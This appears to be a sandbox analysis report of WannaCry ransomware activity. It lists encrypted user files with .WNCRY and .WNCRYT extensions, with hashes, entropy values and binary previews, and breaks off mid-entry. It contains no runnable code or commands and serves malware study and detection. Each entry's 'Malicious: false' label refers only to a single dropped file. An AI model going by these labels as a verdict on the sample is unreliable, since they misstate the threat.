Encrypted:	false
SSDEEP:	24:bklqwNurmVn5/SN0Z9zw+TuxfwbsmQJpG2OtMkXwIeJzEhAxZsHqQ1IdwNcvnFjs:bklqwwyVlSN0Zxw+6RwbX2pGHtHXwhEh
MD5:	63A740BD02F952C7F88D264E3A843FDA
SHA1:	27B6BD36F34A1A4A74A8D610365413AB6FF157F2
SHA-256:	93976F540AF434214968155129B3B8B8AE1C51C8B5BFFC29411113B88B6618CD
SHA-512:	AE1A206C007C3C25BFF0685A8DC631B5FC727133EB423DC0F3E022818B25BBB4FFB743EBB393CEC0144C63970BB656B2763E288011763D9D0CD11C0586AF4D07
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......A.n>Y....ax....}+n.......Py ......k.".w.tb..\...>..Jc...Z...<......>)U.L]...2.[...!..+ne.H....-...5Od......}.t.Mq(].`..Z..Ig.l\...m3..?.>.~-R..u........t..U.F..+\|Q..N....w&1@..`..e.%...=..7...x..^......o.UY........\|......W.k.3_s~g.C.7...K..{]bK................o,..[..qR...Qa.c....d..JO5f.^...rJ......SY8b.........)......!..bn.h..^.m.X......{7<.\|#c.#..gM..N+UU3}m.il...v.=..>....x..(.:Q.\|.&.... .',6...I.(...nGtuw...~...~....l...7!E..T.!.cu...C~....O...OYb.L.....b........b.@.....5/".c....&.Y..v....Wnm.......za..x9z-. ..1l.K..]#H.q(..>=...kM...2MG]......w..,..#M....^...bFX.........X;d.Yx..O..q.OhO).........r..7.Rbp&..l.=...QQ"t.>..1X...(...$..EN............%x.wl...8Z.J. .?....hT..me~....q.....4.!.w..&)".@;.;w...=....o.6.?..](..U...Soa.E&.3U.,..9....P.........v.1....u...Rh.V...u.x..S..Q. ..lC.z..7....`SX..U./.Sa.........Z><..bo.....=[\|....{..O.I...W.l.....7..7"..{%:.y..T.....U..=....i..[8<..Tw...b....Wn.(.6.d.y...9#....s!.S.\|..d.V.W....

C:\Users\user\Documents\GIGIYTFFYT\ZIPXYXWIOY.jpg.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.852491824744748
Encrypted:	false
SSDEEP:	24:bklqwNurmVn5/SN0Z9zw+TuxfwbsmQJpG2OtMkXwIeJzEhAxZsHqQ1IdwNcvnFjs:bklqwwyVlSN0Zxw+6RwbX2pGHtHXwhEh
MD5:	63A740BD02F952C7F88D264E3A843FDA
SHA1:	27B6BD36F34A1A4A74A8D610365413AB6FF157F2
SHA-256:	93976F540AF434214968155129B3B8B8AE1C51C8B5BFFC29411113B88B6618CD
SHA-512:	AE1A206C007C3C25BFF0685A8DC631B5FC727133EB423DC0F3E022818B25BBB4FFB743EBB393CEC0144C63970BB656B2763E288011763D9D0CD11C0586AF4D07
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......A.n>Y....ax....}+n.......Py ......k.".w.tb..\...>..Jc...Z...<......>)U.L]...2.[...!..+ne.H....-...5Od......}.t.Mq(].`..Z..Ig.l\...m3..?.>.~-R..u........t..U.F..+\|Q..N....w&1@..`..e.%...=..7...x..^......o.UY........\|......W.k.3_s~g.C.7...K..{]bK................o,..[..qR...Qa.c....d..JO5f.^...rJ......SY8b.........)......!..bn.h..^.m.X......{7<.\|#c.#..gM..N+UU3}m.il...v.=..>....x..(.:Q.\|.&.... .',6...I.(...nGtuw...~...~....l...7!E..T.!.cu...C~....O...OYb.L.....b........b.@.....5/".c....&.Y..v....Wnm.......za..x9z-. ..1l.K..]#H.q(..>=...kM...2MG]......w..,..#M....^...bFX.........X;d.Yx..O..q.OhO).........r..7.Rbp&..l.=...QQ"t.>..1X...(...$..EN............%x.wl...8Z.J. .?....hT..me~....q.....4.!.w..&)".@;.;w...=....o.6.?..](..U...Soa.E&.3U.,..9....P.........v.1....u...Rh.V...u.x..S..Q. ..lC.z..7....`SX..U./.Sa.........Z><..bo.....=[\|....{..O.I...W.l.....7..7"..{%:.y..T.....U..=....i..[8<..Tw...b....Wn.(.6.d.y...9#....s!.S.\|..d.V.W....

C:\Users\user\Documents\JDDHMPCDUJ.png

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.816776421274406
Encrypted:	false
SSDEEP:	24:O3eVaIm9sXRJ/BPN4m5CdM/RwNjkmkboyPS/di:mebb/N6m5MM/RwNlkboyPmdi
MD5:	B7B19143553AF7F178434C206D96B5DD
SHA1:	779139C3298F4806BD9058A8ED1B88D6768C7472
SHA-256:	D30811AD2726A4519C5605EF4BAC3CF2DB0251E01E6A58FF1C3237F628C53419
SHA-512:	17548A02ED4053ED0C55995DD55844650368B2E13055CFF68763110E7C5AC8BB01B2B108E3A62087C27F47F75BA6A6D70515CB1B5A2F1D5DBDEA87BDC9C2963A
Malicious:	false
Reputation:	unknown
Preview:	.<.."U.<...qb-.G@.o.o..0..?.H\3....5!.s..Uj.o.&..i9..J.v..Q.??.I.Ey.....R.s.5.".B....D.m.....c.....<........?..2..4^<..ce.q...%.R7....L....K......2r.[..K2....V........uu7v `.Y..{QS..=.~N...u."8"......]....t...).&..s...]...(...O....LhA.4 ....(...LK]....%...............F.../.H...\..g.Q....oLX.y...p.Bj5......^K..9#8`.Vp[EF\|..ha.F.i...WJ.}.....6\T.........>..Z_.'.Y...y;.=fx6[.....O...fFe.B...v.....;F...9.3.G>.:.K...M............\|.#.....C....y.=+..d.N.pz.O..">..7.'.W...L.^...........d..C.,.U6...v..H...#1.s._!...4<.:m.XK....,0u3...8...D.`...P,...`..p...\|.GXI......1"Z....g.$qVS..7..Le.s.."5.t.&Q(.y.(.J..fy......<........i.v..EM.f...$1rv.C.....>......ew.I....#....<....7s..... .Z......)..`.."<...9....6Q...1....#....b^.5. .@Pb..w~]k. .:....C.U...zk.^.t..K....)`B.S...lu.....f...J...}.4.(..Kf.Qa...QC.@....PcU..Bk+....#...R..jQ........i.>...e"L.U$..a.3...!.+...#....e...-o....d.2......zP:..l&^h.T.F.Y.....>..C.....c...tb.k\.~...k.a<

C:\Users\user\Documents\JDDHMPCDUJ.png.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839386398016128
Encrypted:	false
SSDEEP:	24:bky+d1x7drc80ROQG2BSQxQ6JvwicQ7sVoYHnzysxbDiPTDaSMP85:bkX7xc3ROQjxfJvbcVV3n9xK/aSMY
MD5:	010995EAD0B1AEE325AB921DC1C0FC79
SHA1:	927C037FB690C7BE6794DAF7F67A39C0C6F5E37B
SHA-256:	39E9973CD781A80FF286613E5B0AE54DD48F90DCD36B5447D26004E867B3FF57
SHA-512:	5AB4F2EB607798B98E3D13DDF4142D974B53CF73B57B76F08533058096DB85F290444FE32D3FBCBE7A5F47EC9A65948E626C64AA0496E4393301FE637D96FE95
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....,.}.=..u-.2...ojb..j.1..O.`.6V..T......M.{.;.`u.L........h..............2..s.O`U......,`>r......D..,....?!9(.....l/9.U;..WO..g!.^.Q..T.,(......V^]$>....2.....h6.."..w\..o..U.........J...ia.7.1J.~..L2..2.5.X.....g......G/_&...5Z9.3.j..>yo).b..t............S.iA.h.........f. N.`...4\|.....u......_].'.m...k..n]eI.M..5..4.M.@6.r.;....}W....{~A.1....Y..4...w..O.`@-9M.4&...~P...........U....&.,...(N:.a.8....e.b...+./pt.....]$"...\|z.-..PO....Q.FM.5.R^....1..r.?.h}.G..$..@...^MP.9Z....2. u.@.....l.m.i.eQ.X.v...'...,yWN...v\|....tA.8D... /.k%.....We.m6H.....f.%J...fGwz....@.]..l.9CH..=..aHO.X/.Tvt.y.zj.o\|9%..W.['C&..jP.....f6.:..jww?...._...J.....-ql.r.D......inm`..+.t%....L..P....<J.\|.Z.......]...q..a.K.. a..GA,..n.H.?....U...2...!@...... .S.L.....s..1:..$v .Ip..A.l.^'V.16..V.BZ-.Ik\|..KY..J.a6.,T...U,....p.././.m.D. .......w.t.........m...~.mDR....ZG...I...\|.}..r........_k+[..Q...<F.K..P..6.z..B..&..IEM.F."A(..bo.l_.@.w...}"G...(

C:\Users\user\Documents\JDDHMPCDUJ.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.839386398016128
Encrypted:	false
SSDEEP:	24:bky+d1x7drc80ROQG2BSQxQ6JvwicQ7sVoYHnzysxbDiPTDaSMP85:bkX7xc3ROQjxfJvbcVV3n9xK/aSMY
MD5:	010995EAD0B1AEE325AB921DC1C0FC79
SHA1:	927C037FB690C7BE6794DAF7F67A39C0C6F5E37B
SHA-256:	39E9973CD781A80FF286613E5B0AE54DD48F90DCD36B5447D26004E867B3FF57
SHA-512:	5AB4F2EB607798B98E3D13DDF4142D974B53CF73B57B76F08533058096DB85F290444FE32D3FBCBE7A5F47EC9A65948E626C64AA0496E4393301FE637D96FE95
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....,.}.=..u-.2...ojb..j.1..O.`.6V..T......M.{.;.`u.L........h..............2..s.O`U......,`>r......D..,....?!9(.....l/9.U;..WO..g!.^.Q..T.,(......V^]$>....2.....h6.."..w\..o..U.........J...ia.7.1J.~..L2..2.5.X.....g......G/_&...5Z9.3.j..>yo).b..t............S.iA.h.........f. N.`...4\|.....u......_].'.m...k..n]eI.M..5..4.M.@6.r.;....}W....{~A.1....Y..4...w..O.`@-9M.4&...~P...........U....&.,...(N:.a.8....e.b...+./pt.....]$"...\|z.-..PO....Q.FM.5.R^....1..r.?.h}.G..$..@...^MP.9Z....2. u.@.....l.m.i.eQ.X.v...'...,yWN...v\|....tA.8D... /.k%.....We.m6H.....f.%J...fGwz....@.]..l.9CH..=..aHO.X/.Tvt.y.zj.o\|9%..W.['C&..jP.....f6.:..jww?...._...J.....-ql.r.D......inm`..+.t%....L..P....<J.\|.Z.......]...q..a.K.. a..GA,..n.H.?....U...2...!@...... .S.L.....s..1:..$v .Ip..A.l.^'V.16..V.BZ-.Ik\|..KY..J.a6.,T...U,....p.././.m.D. .......w.t.........m...~.mDR....ZG...I...\|.}..r........_k+[..Q...<F.K..P..6.z..B..&..IEM.F."A(..bo.l_.@.w...}"G...(

C:\Users\user\Documents\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.809890560257679
Encrypted:	false
SSDEEP:	24:ZJsDurz0pmcKh1uTi4RY/fhAbJsUtBg9iVr/zIU3vYW5+ABl:Vz0pmF/u+4RY/fWFHtBg96rkUfYkBl
MD5:	E6C1C2EAD31A7BD0B0BC65B93B3B5B69
SHA1:	2E55CCD8653B05AAA82AF5BD894EFCA558A31B4D
SHA-256:	E8FD36221012092A714DC4DE21971E6314A00A67922629A21B1E431859AC108C
SHA-512:	824FDA21154A0667BC7DB3485DEF7AE2E4E7B79D7B48B4AE423E2F905DCF8F7D279F059BEF2F585CD42FEC589583BD69A73C1D5B8A68BD325AB61D6A5EDB1B6B
Malicious:	false
Reputation:	unknown
Preview:	<.....y.a\z{\.SW._...!`..> ..S......p..7@.cF.{6).q..L.x.y..&.9w....RboQ.&.;..Gi.u....-..../.V`...v.K...W#.......7?....Wd..G...{u..n......#....8...S...........{k+....p....X........s#H..o.p.._> V.o.9.&8..x....Lf..V...!XrP6t...V^....w.....e^..h&..k.\c..]...."..>.+N......LX\.@a:.R..}.X...eA...Q..'&{.."~.D. G.m"....e4O....>S..v..z)....?.M..2....1..k..=...#.F.s.%.L..m2.....7k.......-rt.5.Y..K.o{.......@..9.{.A.hi..7<,.M.[..Dd..g.!b...5....b..\.........b.bY.M4.X4vd..^...n.G.c%.E.H.Au..81s.o..E\|.......I...D.l...<y.R..#z%.@..LS.-......a.U....B.............(C.Zd....#9....?c......K.m.......Z....uw..k.....H...&JwYoyX.....L.R.5s..?....N........\-..W..X....g....H.jj.....)(nT......H&.r..%....o.N(.\).N.....y.... %.z.Q\..$...#J.Y.z.(..oe.l......\....`..8+..v...j~.r1...=....]A.+...Q......p.K.Or....P ....Ya...}5.c.......{:.?....;=......A...d4.o.k.....;DK(.\.=...eV..Q...<..@.K..............u.90;.p..dO..),........{....k..9.?}..........T#............`..vO:.

C:\Users\user\Documents\KLIZUSIQEN.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.844768973379602
Encrypted:	false
SSDEEP:	24:bkDc5Y7mZ7W4cyPGcSEQIW7kwfG6v7XAMrYPz8n7AlGLZVCTSiZ6G9Qi5iukyn:bkDVmZ7W4cyzGmULAwY787AlAZoWiZWa
MD5:	7C7400CA29B18C1637D5B5470D08D78D
SHA1:	5FC600880CBDB048F0D417A3DE327FF6913740FB
SHA-256:	0D2ACFDF7D1FB571DD703FD5BA6AE15704E6FF414AB46F4D96412F9DDEBD5422
SHA-512:	10AF68C47B1D6FF41A307B82B9C2B35DD054A3950951BE20A5526ED2E99CF7382485B301EFDEE2C5A7F51E88AF6314854D8FC6F999163E680DA732108619CF1A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....(...}..S&...0....?.].r......w...I>...F..UWq........ K...._.uc...)8...b.5.T....F./.7K..ZW...KI....+..>.L...j]F..K....~.i....o..K,..........n...3%.RW..K._H..h0...%&<k....v..2.o.."\..5.$y....\|...C~..Z.. U......j~=z.t{.G.=^...O...U1.["i.O....`..............61Cb...0...d9w..,........U.~b..B{.o..7...sWAw..2.y.:UJ&bq}.,.s..9.H?.t...Z...R.........qi.;#.'N../Q...w..m.:....l...y.F...j8....m../...w?.?..z<v.k.W......M.rt\|..>...9.L..._di>.CD..ab...8......L..s....P.S.@..h>.X....?.(...\|K.:...n..TU.::..-...../C.O..d.9.o..........[>T..Y. M.D$....)..F.."............IX.....d...L..h,.:.1..K.a.Sj..aG6..N .@.............?.=vm....%......%`.7o.J...K..d.....t[.>.k....gVU...Y.Q!..I..R.~.ql.+....<2b....D.lECD.Pp..7.:........F....:....=.x.T.I.5`J..^.4...-.'Bt....3.7=tE..u..E.../.X...VF.4.-.V..:.._M\+....P.._.r....t.`.M....s..T..<QpZ... ....$;..Y..O...2R.4..p...]..?...;w.^.....w../..=}bY.w.V..C.X...l..>.@.&..u...P.l..S{.6......P...p...k...y.k..QD,.2.!

C:\Users\user\Documents\KLIZUSIQEN.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.844768973379602
Encrypted:	false
SSDEEP:	24:bkDc5Y7mZ7W4cyPGcSEQIW7kwfG6v7XAMrYPz8n7AlGLZVCTSiZ6G9Qi5iukyn:bkDVmZ7W4cyzGmULAwY787AlAZoWiZWa
MD5:	7C7400CA29B18C1637D5B5470D08D78D
SHA1:	5FC600880CBDB048F0D417A3DE327FF6913740FB
SHA-256:	0D2ACFDF7D1FB571DD703FD5BA6AE15704E6FF414AB46F4D96412F9DDEBD5422
SHA-512:	10AF68C47B1D6FF41A307B82B9C2B35DD054A3950951BE20A5526ED2E99CF7382485B301EFDEE2C5A7F51E88AF6314854D8FC6F999163E680DA732108619CF1A
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....(...}..S&...0....?.].r......w...I>...F..UWq........ K...._.uc...)8...b.5.T....F./.7K..ZW...KI....+..>.L...j]F..K....~.i....o..K,..........n...3%.RW..K._H..h0...%&<k....v..2.o.."\..5.$y....\|...C~..Z.. U......j~=z.t{.G.=^...O...U1.["i.O....`..............61Cb...0...d9w..,........U.~b..B{.o..7...sWAw..2.y.:UJ&bq}.,.s..9.H?.t...Z...R.........qi.;#.'N../Q...w..m.:....l...y.F...j8....m../...w?.?..z<v.k.W......M.rt\|..>...9.L..._di>.CD..ab...8......L..s....P.S.@..h>.X....?.(...\|K.:...n..TU.::..-...../C.O..d.9.o..........[>T..Y. M.D$....)..F.."............IX.....d...L..h,.:.1..K.a.Sj..aG6..N .@.............?.=vm....%......%`.7o.J...K..d.....t[.>.k....gVU...Y.Q!..I..R.~.ql.+....<2b....D.lECD.Pp..7.:........F....:....=.x.T.I.5`J..^.4...-.'Bt....3.7=tE..u..E.../.X...VF.4.-.V..:.._M\+....P.._.r....t.`.M....s..T..<QpZ... ....$;..Y..O...2R.4..p...]..?...;w.^.....w../..=}bY.w.V..C.X...l..>.@.&..u...P.l..S{.6......P...p...k...y.k..QD,.2.!

C:\Users\user\Documents\QCOILOQIKC.mp3

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.796713567935763
Encrypted:	false
SSDEEP:	24:uBSDrzs6/9g55OwdSx2yrWIobkU1ZtH2koiCj/cpojVR:Y36/9uOwSnid7tCD9j
MD5:	63263CAD1E1F61C74DB8A4F6BF8A4DB6
SHA1:	CF8F812478C7B8933B529904F9333BC5CE651D2A
SHA-256:	5DD8D7319F7ECC6F44B51C4B9D41DC3C60B0AECB7D5F180F1A5A572B52B1F2AA
SHA-512:	6D7295CC346DBBE4C4FF789DB58BDF9CB8F1FABE75CFAB5CD4515AB64E7F362428F7062D6CE293D2E714335C5C9AEAFAED7250269C14B6118D67639869879745
Malicious:	false
Reputation:	unknown
Preview:	....rs..z.c..Y.r8;b..ei....^....X.\|...}....yx...Ki...X..d.9i..(.a@.yY....N...=._...>BR..n...PC}++.\.S>. ..m9.....2..0.f........8.2q....h...M.....&..H...PP....(...}........_.Q.#r-Zp.....TA._...p1.g......?..3.B....-~.m.U.u..4?.#...~.Up...G..._.....[3......i...6..'..^.$;.\.[.IV)Fwh=]L.E>u....!..37.M...q.7>w1:....MB.V....K..j...VSJ.....<..j.c.......c<d>_.......s,..0..~....?..-........#....}.....<..a...A,.....P.Q..c.`m./B.3u%...X..c..-Gz........9....L@O\|.A.<n. .\.d....KK~.%h2.H.F.3.....8....K.I....0[..OaO..j...h.....d...s)..sP....n..u...k{..0...F.'.1D..E\|f/I.@.~P...i..\|..z[9(.;M.(.N......2.J..V n.'.H..P.#c.Jc....%...J........_..\.<.5E%j......~`...+...p.I.....Q..&&4../F....Z..Xj4..H.W.C...P..0.L...c.>.:\|...fi....+...Y.!e......'..%...H .G..O..TX.......=k...S..\|...9...(..'Dq.....{.ev........r..J;...b...n'.D.p..`O.....T.....WBV.....a...pa...bW8.r.}O.a..Y.Z.g..B=/.....F..z.I...)E.B.XOc...@..yD.M.t...ZL....Q.O.].#.F.M}.yo..y...7 ......>..4...E.>G

C:\Users\user\Documents\QCOILOQIKC.mp3.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.861947821726674
Encrypted:	false
SSDEEP:	24:bkny0+65Nm4J+6fgRPdPIly46cxG45kfepXNIksTdGIjNFQMmkT2NGT/ep:bky0+6rmG+IKL4UA+TjHtKGT/K
MD5:	77A7FCAD5D9C333FC913CED7395641FD
SHA1:	BEF4B2C2EF434D1E03A255B5692C43511FD10B9D
SHA-256:	482199CDBE7A1EA66CF348F1F12235BE1245DB9F24E247C0C33887643886AD8E
SHA-512:	FC0356B2CFE0EC0CC6421649233F3A8BA8AEF6DAB2DA0C9813230420711869C4F7A016FCAE38D0E97566EC56474937B93C7308BBE34BFB1628DDA5130570B7E5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....)Q...,..}.B...!..';..#E......e.......Z.qE#..iZ.k.s.Q...ar........b..B....2........3..^.......<`.P..Y.;W......]..x.?..eG.=b..A...H?x..B..&..(.~W..;.E..~....}.m..D..#B.Q...&.j.\.qg......,.Y\.;...q.'..M.....u..o.y=R_.8...w..].{....^Y"^..Dm...!................{..h........H.I>..>..+..x.&."`..1?../...?/...H...z.=...aR...(..3:......L......;C..$\._.(\|N.X..3.d..8....X.WC.e..-j.xe..S4.....o..6.MyM......C.....bY.(.(..GJ..."....+...M..2.hB.h..........[:.]......X...:..kr...Z....j.N..<$.........+c..gL.&_.a.&T... .......VL..g.Z)>wo.GHW..k...+.EDV....h...A....v.."...z}+.....U.\..f]F.....<.y.9..zz.........=W.`@....~...5.O...f..ZlR..CYh. ..=..Y...\|..8."...r....O. ...k8..B.R.I.\.#0........t.T.`..R[..._.L.......!.F:M...+J......-...v..^.....w.....c...MA..._...#.@L.Fg.L..`.K.jh/.\|.T..Z.....)....R...&9#}..V4.V..u].P.0b...-o"...9...T...Tf....h....b....+.1.......V.L...6L.V..?WUAd....5;9..`7.&..`..}.=......>.t...V.....e.N\..Z..v.....r.(A..~

C:\Users\user\Documents\QCOILOQIKC.mp3.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.861947821726674
Encrypted:	false
SSDEEP:	24:bkny0+65Nm4J+6fgRPdPIly46cxG45kfepXNIksTdGIjNFQMmkT2NGT/ep:bky0+6rmG+IKL4UA+TjHtKGT/K
MD5:	77A7FCAD5D9C333FC913CED7395641FD
SHA1:	BEF4B2C2EF434D1E03A255B5692C43511FD10B9D
SHA-256:	482199CDBE7A1EA66CF348F1F12235BE1245DB9F24E247C0C33887643886AD8E
SHA-512:	FC0356B2CFE0EC0CC6421649233F3A8BA8AEF6DAB2DA0C9813230420711869C4F7A016FCAE38D0E97566EC56474937B93C7308BBE34BFB1628DDA5130570B7E5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....)Q...,..}.B...!..';..#E......e.......Z.qE#..iZ.k.s.Q...ar........b..B....2........3..^.......<`.P..Y.;W......]..x.?..eG.=b..A...H?x..B..&..(.~W..;.E..~....}.m..D..#B.Q...&.j.\.qg......,.Y\.;...q.'..M.....u..o.y=R_.8...w..].{....^Y"^..Dm...!................{..h........H.I>..>..+..x.&."`..1?../...?/...H...z.=...aR...(..3:......L......;C..$\._.(\|N.X..3.d..8....X.WC.e..-j.xe..S4.....o..6.MyM......C.....bY.(.(..GJ..."....+...M..2.hB.h..........[:.]......X...:..kr...Z....j.N..<$.........+c..gL.&_.a.&T... .......VL..g.Z)>wo.GHW..k...+.EDV....h...A....v.."...z}+.....U.\..f]F.....<.y.9..zz.........=W.`@....~...5.O...f..ZlR..CYh. ..=..Y...\|..8."...r....O. ...k8..B.R.I.\.#0........t.T.`..R[..._.L.......!.F:M...+J......-...v..^.....w.....c...MA..._...#.@L.Fg.L..`.K.jh/.\|.T..Z.....)....R...&9#}..V4.V..u].P.0b...-o"...9...T...Tf....h....b....+.1.......V.L...6L.V..?WUAd....5;9..`7.&..`..}.=......>.t...V.....e.N\..Z..v.....r.(A..~

C:\Users\user\Documents\QCOILOQIKC.pdf

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.817874316566713
Encrypted:	false
SSDEEP:	24:g3MglF8K9aIlP3UnkSGcz7+cc0P5P+yF6e4kvuOzHHmNS:g8oIIJ3UkSNzK70PJDo1OzHKS
MD5:	438AA50E7585C987018E8CCB43AD92DF
SHA1:	4584578530CDD817CCA61DBA69C3A2E4C67C2B4D
SHA-256:	CDBEAA599F098B0CAA334D5C619FDDEE197C013F99AD20DA14DF4D4535AFBF85
SHA-512:	EF63F232317D6C6FEFCF16DD4AC27DE687B5A6A416E49BD8D9CD076BA747E4564B232782BE39BDCD642F1C0636474F1840D099E5764FB07B20BE9D205BBF3865
Malicious:	false
Reputation:	unknown
Preview:	....{....o.X<...e..54.Nb.s4....O....a...<v,.../%m6.m..`..A....8.-qju.r.Z...rE.S<.P3Y..........yr.+A\|.....u...:....&hF.\...mhn.^.X......(...7A.N...8x.5..!..G..\..Q......N.s....~....o..#~..VC.?..e.0a.....5Y.A...B..C...{4..X4zWj/. g9.c`..h.^.i.T....3....+e..!...u........t..=..Z.P.c..).K{...M...2[.`.:0._wF.[......3...D..:.....v.WW.[.]1;S-&.l.-.1b.%.....8... }m..(........s..L..I'.u.H..3.X2u...........;....e..!u..s..B..l.u4.z.0.X..u...._.........Zc.bs....F7..^P..1......Y.....).?..Rz...V=...zk.....63.......x.).9.6x.d..-q"$.04......G...g....[..A..G0.J[?.ng...Tf.&.)W.%>e}.[<.).uy9....9eM.{O/..%75iJ......nF^4.+...!...y..A.5N........r...._......Id....doV...QO.-.....7.&.M.DH.2.~.g...~.eV.c...kR..?S.A....d...q...<..Dg...s. ..I..,.#.k..3.}lV..bh"Y..Wu..M.P..z&.{...I5...q..A.Wj.....6Cw2.Y.T...3>R..o..Dr.1@....$...a?$.-.a.Nz....QPx.0.....g..*..QQ.P\.)...N..j...Z..F.28$.^L...U.(...I.E.t...S+BE...:.=.W.#.P...`...>:!j..^k)...V.k..3...l...

C:\Users\user\Documents\QCOILOQIKC.pdf.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8469391085901075
Encrypted:	false
SSDEEP:	24:bkSHaPw6MSNrj3CdNBqQIJgH+B1zl5w+KWQesSlNXiB172:bk0TveWTBqdD1Zu+g972
MD5:	379744BAB498356E5A2FFCB74EFF9875
SHA1:	A35A7817990912FE54614FEADCC223F45B4AA5D6
SHA-256:	84213BB05AA2BD5BE79793171BC4D4B6E316F3AA588E3EED3BA3F2A3F2915642
SHA-512:	35344B4E288D4232120665C927F1A7971B7A8BC7BFF0DA48B3BE4F38AFE32A16947C34052D7E8309455CAD9E4CE34EE9B2E62BB2D1E754BE9C14AC566EAEC7C9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....\fx.j[..O...Lw..d.E..9{..Pc...bTo:BB.Q.......[l.Y...-..S..X8.T._..:mD.F.!..^.p&..Q.....`.1M..>.Q....8z.....V...?..}2Ty"s.F.M.U..E_...z.........kw....f[.X$.7$.p..[.....h..\~.....X.7'.H..o.u....p....2/...}.@q.......&E.N......."zv..gt.v....1u.....K5............!.t.s.D..`...]KJ..\F.Nr@.V.9q....[...d.+.(z.%O.L.B1\|.Io.<.`zl.m/&...>@.8A........T...">w<.G...A#vG....=..Z.xkw.....M.Y....[..`{..f..f.hn...-k..d.PS....KHR....q_5>.P..?<.FkiP)@.o......p.!s..v.......~..v2.`jb,...s.qo..j....a..x5H..... .....S.5.)g 0.....E...).<...}..."vn.J..":.$.....G...x]=e.h..4.-.dA..l%....e......2...b[..]b..p..-[.iB.s.95..a.<`F.5..r..m...V.j.z.R.O.d@.Y..[.8...Gw3.\|.S.....J.2.'......[./_..oKC.....;{A...?@....,..g..<...+..B9._..!.x.#............L.1.....`........cD28_pnri.?.kjr".#w...(..}h...Y./..(Y_..z.[j,.@.\|.[..Wi.;V..^;..d.kW.0..{....dj9v...F.5"...e%L.....n?.......b(...`... ...W).........*......ID@.S.}7Il.......c.]..F9...)~-...H."V.sI&`...6;/.....(..z..%....

C:\Users\user\Documents\QCOILOQIKC.pdf.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	7.8469391085901075
Encrypted:	false
SSDEEP:	24:bkSHaPw6MSNrj3CdNBqQIJgH+B1zl5w+KWQesSlNXiB172:bk0TveWTBqdD1Zu+g972
MD5:	379744BAB498356E5A2FFCB74EFF9875
SHA1:	A35A7817990912FE54614FEADCC223F45B4AA5D6
SHA-256:	84213BB05AA2BD5BE79793171BC4D4B6E316F3AA588E3EED3BA3F2A3F2915642
SHA-512:	35344B4E288D4232120665C927F1A7971B7A8BC7BFF0DA48B3BE4F38AFE32A16947C34052D7E8309455CAD9E4CE34EE9B2E62BB2D1E754BE9C14AC566EAEC7C9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....\fx.j[..O...Lw..d.E..9{..Pc...bTo:BB.Q.......[l.Y...-..S..X8.T._..:mD.F.!..^.p&..Q.....`.1M..>.Q....8z.....V...?..}2Ty"s.F.M.U..E_...z.........kw....f[.X$.7$.p..[.....h..\~.....X.7'.H..o.u....p....2/...}.@q.......&E.N......."zv..gt.v....1u.....K5............!.t.s.D..`...]KJ..\F.Nr@.V.9q....[...d.+.(z.%O.L.B1\|.Io.<.`zl.m/&...>@.8A........T...">w<.G...A#vG....=..Z.xkw.....M.Y....[..`{..f..f.hn...-k..d.PS....KHR....q_5>.P..?<.FkiP)@.o......p.!s..v.......~..v2.`jb,...s.qo..j....a..x5H..... .....S.5.)g 0.....E...).<...}..."vn.J..":.$.....G...x]=e.h..4.-.dA..l%....e......2...b[..]b..p..-[.iB.s.95..a.<`F.5..r..m...V.j.z.R.O.d@.Y..[.8...Gw3.\|.S.....J.2.'......[./_..oKC.....;{A...?@....,..g..<...+..B9._..!.x.#............L.1.....`........cD28_pnri.?.kjr".#w...(..}h...Y./..(Y_..z.[j,.@.\|.[..Wi.;V..^;..d.kW.0..{....dj9v...F.5"...e%L.....n?.......b(...`... ...W).........*......ID@.S.}7Il.......c.]..F9...)~-...H."V.sI&`...6;/.....(..z..%....

C:\Users\user\Documents\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	DOS executable (COM)
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.780668914365367
Encrypted:	false
SSDEEP:	24:39o5SJA8m5odOHCO7MHiPD1fhK6rGMk+J4+s7M8og847u5Myy3v:q+AedO/7YiPVscG4i7Mr4C5Mv3v
MD5:	F9DCA7AE8BC129CEA033C41D8D5D62A9
SHA1:	B662A092218C9CB045D40CE12371281BD63F3243
